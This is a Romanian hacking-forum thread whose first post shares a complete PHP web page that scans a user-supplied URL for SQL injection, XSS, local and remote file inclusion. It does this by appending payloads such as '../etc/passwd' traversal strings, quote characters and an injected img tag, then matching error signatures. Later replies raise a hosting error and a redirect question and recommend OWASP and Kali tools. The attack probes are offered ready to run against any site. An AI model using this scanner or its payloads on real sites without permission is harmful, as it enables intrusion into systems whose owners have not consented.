cosminkent Posted March 10, 2014 Report Posted March 10, 2014 <?php set_time_limit(0);?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>Fara titlu de prezentare </title> <style type="text/css"> body { color: #ffffff; text-shadow: 2px 2px #000000; background-color: #282828; font-family: Arial, Helvetica, sans-serif; } pre { background-color: #353535; border: solid 1px #505050; } input { font-family: Arial, Helvetica, sans-serif; } .Button { padding: 5px 10px; background: #303030; border: solid #101010 1px; color: #fff; cursor: pointer; font-weight: bold; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; text-shadow: 1px 1px #000; } .Input { border: solid #101010 1px; color: white; font-weight: bold; padding: 3px; background-color: #252525; } </style></head><body><div align="center"><pre><img src="http://i.imgur.com/oTFJi.jpg" width="280" height="125" title="RST" alt="RSTFORUMS" /></pre> <form method="POST" action=""> Adauga url : <input type="text" name="url" value="<?php if(isset($_POST['url'])){echo(htmlentities($_POST['url']));}?>" placeholder="http://example.com/index.php?id=1'" size="75" class="Input" /> <input type="submit" name="submit" value="Scanare" class="Button" /> </form> <br /> <?php ##RST ##FORUMS class Vulnscanner { private $sql = array("'",'"'); private $rfi = array("http://www.facebook.com"); private $lfi = array("../etc/passwd", "../../etc/passwd", "../../../etc/passwd", "../../../../etc/passwd", "../../../../../etc/passwd", "../../../../../../etc/passwd"); private $xss = array("'\"/><img src=\"http://rstforums.com\"/>"); private $sqlerrors = array("mysql_", "A aparut o eroare in sintaxa SQL", "SQL Error", "Eroare baza de date", "Eroare MySQL"); private $rfierrors = array("Bun venit pe Facebook - Inregistreaza-te sau Logheaza-te"); private $lfierrors = array("root:x:0:0:root:", "EROARE: Nu exista fisierul sau directorul specificat"); private $xsserrors = array("<img src=\"http://rstforums.com\"/>"); public function isvalid($link) { if(filter_var($link,FILTER_VALIDATE_URL) && strstr($link,"=")) return true; return false; } private function getcontents($link) { $agent= 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0'; $ch = curl_init(); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_VERBOSE, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_USERAGENT, $agent); curl_setopt($ch, CURLOPT_URL,$link); $result=curl_exec($ch); return $result; } private function errorcheck($url,$addtourl,$errorar) { foreach($addtourl as $val) { $link = $url.$val; $contents = $this->getcontents($link); foreach($errorar as $err) { if(strstr($contents, $err)) return true; } } return false; } public function issqlvulnerable($link) { $orig = $link; if($this->errorcheck($orig,$this->sql,$this->sqlerrors)) echo htmlentities($orig) ." Site-ul <span style=\"color: green;\">ESTE</span> vulnerabil SQL Injection.<br />"; else echo htmlentities($orig) ." Probabil <span style=\"color: red;\">NU</span> este vulnerabil SQL Injection.<br />"; } public function isrfivulnerable($link) { $orig = $link; $link = substr($link,0,strpos($link,'=')+1); if($this->errorcheck($link,$this->rfi,$this->rfierrors)) echo htmlentities($orig) ." Site-ul <span style=\"color: green;\">ESTE</span> vulnerabil RFI.<br />"; else echo htmlentities($orig) ." Probabil <span style=\"color: red;\">NU</span> este vulnerabil RFI.<br />"; } public function islfivulnerable($link) { $orig = $link; $link = substr($link,0,strpos($link,'=')+1); if($this->errorcheck($link,$this->lfi,$this->lfierrors)) echo htmlentities($orig) ." Site-ul <span style=\"color: green;\">ESTE</span> vulnerabil LFI.<br />"; else echo htmlentities($orig) ." Probabil <span style=\"color: red;\">NU</span> este vulnerabil LFI.<br />"; } public function isxssvulnerable($link) { $orig = $link; $link = substr($link,0,strpos($link,'=')+1); if($this->errorcheck($link,$this->xss,$this->xsserrors)) echo htmlentities($orig) ." Site-ul <span style=\"color: green;\">ESTE</span> vulnerabil XSS.<br />"; else echo htmlentities($orig) ." Probabil <span style=\"color: red;\">NU</span> este vulnerabil XSS.<br />"; } } // END OF CLASS if(isset($_POST['url']) && isset($_POST['submit'])) { $obj = new Vulnscanner(); $link = $_POST['url']; if($obj->isvalid($link)) { $obj->islfivulnerable($link); $obj->isxssvulnerable($link); $obj->issqlvulnerable($link); $obj->isrfivulnerable($link); } else { echo "<span style=\"color: red;\">". htmlentities($link) ." nu este un link valid.</span>"; } } ?><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><a href="http://rstforums.com"><span style=\"color: red;\">RSTFORUMS.COM</span></a></div></body></html>Source: HCPoate va este de folos Quote
sniperspy Posted March 10, 2014 Report Posted March 10, 2014 imi scrie Warning: set_time_limit() has been disabled for security reasons in /home/a5940441/public_html/sniperspy.html on line 2 ce sa fac? Quote
123a Posted May 8, 2015 Report Posted May 8, 2015 si daca un site are redirect si imi da ca acest link nu e bun...cum pot gasi adevaratul redirect.....MS, Quote
blech Posted May 8, 2015 Report Posted May 8, 2015 @123a are mai mult de un an vechime acest thread.iti recomand cu caldura sa deschizi un nou topic la ajutor si sa oferi cat mai multe detalii despre problema ta. Quote
anoxdox Posted May 10, 2015 Report Posted May 10, 2015 Programul asta e destul de vechii, folositi owasp e unul foarte bun de gasit vulnerabilitati sau mai are kali linux inca o gramada de programe pentru asa vulnerabiitati. Quote
